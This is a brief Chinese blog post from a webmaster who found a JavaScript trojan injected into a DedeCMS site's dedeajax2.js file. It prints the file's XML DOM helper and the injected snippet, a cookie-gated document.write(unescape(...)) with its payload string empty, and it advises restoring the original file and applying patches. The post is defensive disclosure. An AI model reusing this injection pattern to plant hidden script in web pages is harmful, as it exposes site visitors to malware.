dedecms:dedeajax2.js被植入js木馬
時間: 2019-05-13 11:35
閱讀: 次
作者:素材無憂網
這陣子我的一個網站被植入了木馬,程序dede。于是我升級到了IE7+全補丁,為了查木馬做準備工作,呵呵。結果發(fā)現(xiàn),dedeajax2.js被植入了木馬。源碼如下:
//初始化xmldom
function InitXDom(){
if(DedeXDOM!=null) return;
var obj = null;
if (typeof(DOMParser) != "undefined") { // Gecko、Mozilla、Firefox
var parser = new DOMParser();
obj = parser.parseFromString(xmlText, "text/xml");
} else { // IE
try { obj = new ActiveXObject("MSXML2.DOMDocument");} catch (e) { }
if (obj == null) try { obj = new ActiveXObject("Microsoft.XMLDOM"); } catch (e) { }
}
DedeXDOM = obj;
};
//以下是被植入木馬的部分,亂碼都是經由unicode碼處理。現(xiàn)在的馬夫越來越狡猾了
if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);document.cookie='hello=Yes;path=/;expires=' expires.toGMTString();document.write(unescape(""));}
用原版本的dedeajax2覆蓋,即可。這個文件,dede的模板都要用到,搜索了,沒有發(fā)現(xiàn)說明用處。
不過建議大家,多注意dedecms的官方補丁,unix服務器的站長,千萬別所有文件都是設置,雖然dede在unix的服務器上,設置太過繁瑣。
關鍵字描述:木馬 obj " if new // null var dede 植入
標簽: